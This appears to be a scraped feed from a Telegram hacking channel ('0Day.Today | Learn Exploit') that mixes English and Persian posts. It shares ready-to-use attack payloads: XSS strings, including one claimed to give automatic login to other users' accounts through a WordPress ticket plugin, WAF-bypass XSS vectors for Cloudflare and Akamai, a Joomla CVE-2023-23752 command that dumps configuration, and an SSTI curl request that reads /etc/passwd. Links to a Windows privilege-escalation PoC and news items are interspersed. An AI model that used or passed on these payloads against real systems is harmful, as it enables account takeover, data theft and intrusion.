Tiny XSS Payloads
A collection of tiny XSS Payloads that can be used in different contexts.
Github
#Xss #payload
——————
0Day.Today
@LearnExploit
@Tech_Army
A collection of tiny XSS Payloads that can be used in different contexts.
Github
#Xss #payload
——————
0Day.Today
@LearnExploit
@Tech_Army
🤝5👍1
در نسخه جدید پلاگین ژاکت:
zhaket.com/web/wp-advanced-support-ticket
باگی وجود داره که میتونید از طریق این پلاگین خیلی ساده به پنل افراد دیگه دسترسی داشته باشید.
site.ir/my-account/tickets/?sss=t&ddd=1
پیلود تست شده :
https://site.ir/my-account/tickets/?action=view&ticket-id=22%3Cscript%3Ealert(1)%3C/script%3E
بجای عدد 1، ایدی عددی یوزر مورد نظرو بزنید. خودکار لاگین میشید.
site.ir/my-account/tickets/?sss=t&ddd=1
#XSS #WordPress
——————
0Day.Today
@LearnExploit
@Tech_Army
zhaket.com/web/wp-advanced-support-ticket
باگی وجود داره که میتونید از طریق این پلاگین خیلی ساده به پنل افراد دیگه دسترسی داشته باشید.
site.ir/my-account/tickets/?sss=t&ddd=1
پیلود تست شده :
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
پیلود تست شده :https://site.ir/my-account/tickets/?action=view&ticket-id=22%3Cscript%3Ealert(1)%3C/script%3E
بجای عدد 1، ایدی عددی یوزر مورد نظرو بزنید. خودکار لاگین میشید.
site.ir/my-account/tickets/?sss=t&ddd=1
#XSS #WordPress
——————
0Day.Today
@LearnExploit
@Tech_Army
✍6👍3⚡1
ورود آیفون ممنوع شد .
طبق ابلاغیه مدیر کل دفتر واردات گمرک ایران از اول اسفندماه گوشی تلفن همراه با نشان تجاری اپل، مدل ۱۴ و کلیه مدلهای بعد از آن، جزء لیست کالاهای مجاز همراه مسافر و پستی ورودی به کشور نیست.
وزارت صمت مرجع صادرکننده این ابلاغیه است.
#news
——————
0Day.Today
@LearnExploit
@Tech_Army
طبق ابلاغیه مدیر کل دفتر واردات گمرک ایران از اول اسفندماه گوشی تلفن همراه با نشان تجاری اپل، مدل ۱۴ و کلیه مدلهای بعد از آن، جزء لیست کالاهای مجاز همراه مسافر و پستی ورودی به کشور نیست.
وزارت صمت مرجع صادرکننده این ابلاغیه است.
#news
——————
0Day.Today
@LearnExploit
@Tech_Army
🤔4👌3🤨3
This media is not supported in your browser
VIEW IN TELEGRAM
LPE via StorSvc
Windows Local Privilege Escalation via StorSvc service (writable SYSTEM path DLL Hijacking)
Github
#POC #Windows
——————
0Day.Today
@LearnExploit
@Tech_Army
Windows Local Privilege Escalation via StorSvc service (writable SYSTEM path DLL Hijacking)
Github
#POC #Windows
——————
0Day.Today
@LearnExploit
@Tech_Army
🤝2
این آخرین باری هست که اینترنت اکسپلورر رو میبینید، مایکروسافت امروز آپدیتی برای حذفش منتشر میکنه . 🖤
#News
——————
0Day.Today
@LearnExploit
@Tech_Army
#News
——————
0Day.Today
@LearnExploit
@Tech_Army
🫡13😢7👌2❤1👍1👏1🎉1
Unusual 403 Bypass to a full website takeover
Read Here
#Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
Read Here
#Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡3👍1
reNgine 🔥
The only web application recon tool you will ever need!
Github
#Osint #Recon #Tools
——————
0Day.Today
@LearnExploit
@Tech_Army
The only web application recon tool you will ever need!
Github
#Osint #Recon #Tools
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡4❤🔥1
CVE-2023-23752
An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints
severity: high 🆘
Github
#CVE #Joomla
——————
0Day.Today
@LearnExploit
@Tech_Army
An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints
severity: high 🆘
Github
#CVE #Joomla
——————
0Day.Today
@LearnExploit
@Tech_Army
👍1
0Day.Today | Learn Exploit | Zero World | Dark web |
CVE-2023-23752 An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints severity: high 🆘 Github #CVE #Joomla —————— 0Day.Today @LearnExploit @Tech_Army
CVE-2023-23752 ( PoC )
Joomla webservice endpoint access
#CVE #Joomla #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
Joomla webservice endpoint access
httpx -l ip.txt -path '/api/index.php/v1/config/application?public=true'
#CVE #Joomla #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
👍3✍2🤝1
Cloudflare bypass & template injection to XSS in one shoot
#cloudflare #bypass #xss
——————
0Day.Today
@LearnExploit
@Tech_Army
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
#cloudflare #bypass #xss
——————
0Day.Today
@LearnExploit
@Tech_Army
✍4
آموزش نصب Metasploit روی ویندوز
Metasploit
#metasploit #exploit #windows
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
Metasploit
#metasploit #exploit #windows
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥4✍1👍1
Akamai WAF bypass through right-click
<details onauxclick=confirm`xss`></details>
#Waf #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
<details onauxclick=confirm`xss`></details>
#Waf #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡2❤2
SSTI to RCE:
#SSTI #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
curl -X POST http://test.com:8080 -H "Cookie: token=eyJhbGciOiJI5cCI6Ikp.eyJ1c2VybmFtZSI6IndpemFyZC5vn0.YuW5qoU_-3FQ6q5wyFPw3PFlDHDOjuu2k" --data "name=name&desc={{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}"
#SSTI #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥5👍1